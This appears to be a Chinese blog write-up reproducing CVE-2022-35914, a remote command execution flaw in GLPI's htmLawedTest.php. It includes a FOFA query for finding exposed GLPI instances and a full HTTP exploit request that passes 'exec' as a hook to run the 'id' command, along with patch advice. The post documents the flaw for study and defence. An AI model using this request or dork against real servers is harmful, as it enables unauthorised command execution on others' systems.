GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914分析复现
2022-10-24 11:16:51 Author: 银河护卫队super(查看原文) 阅读量:48 收藏

漏洞描述

GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,你可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。GLPI10.0.2及之前版本存在安全漏洞,该漏洞源于htmlawed模块中的

/vendor/htmlawed/htmlawed/htmLawedTest.php允许PHP代码注入。

漏洞复现

一、fofa搜索

Fofa搜索:title="GLPI - 登陆入口"

二、风险等级

高危

三、影响版本

GLPI 10.0.2及之前版本

四、漏洞利用

1、执行POC获取token和sid

POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection:closeCookie: sid=d531j7fek8t6v3d0d0jpk558q5Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 88token=6dfbe8fefb8bf88a06596e458b976911&text=id&hhook=exec&sid=d531j7fek8t6v3d0d0jpk558q5

2、将获取的token和sid值替换请求数据包中数据,exec执行id命令,得到回显

POC:https://github.com/cosad3s/CVE-2022-35914-poc
五、修复建议
官方已发布安全版本https://glpi-project.org/fr/glpi-10-0-3-disponible/https://github.com/glpi-project/glpi/releases/tag/10.0.3

END

• 往期精选

windows提权总结

一次SSH爆破攻击haiduc工具的应急响应

记一次艰难的SQL注入(过安全狗)

记一次溯源

下方点击关注发现更多精彩


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwNzI0MTQzOA==&mid=2247492636&idx=1&sn=bc96ad9c90057b0353f11a66b50dc350&chksm=c0de96adf7a91fbb05563a5c7379ae3d15d7deaea87680591350dbdb87bb24383d88442736ec#rd
如有侵权请联系:admin#unsafe.sh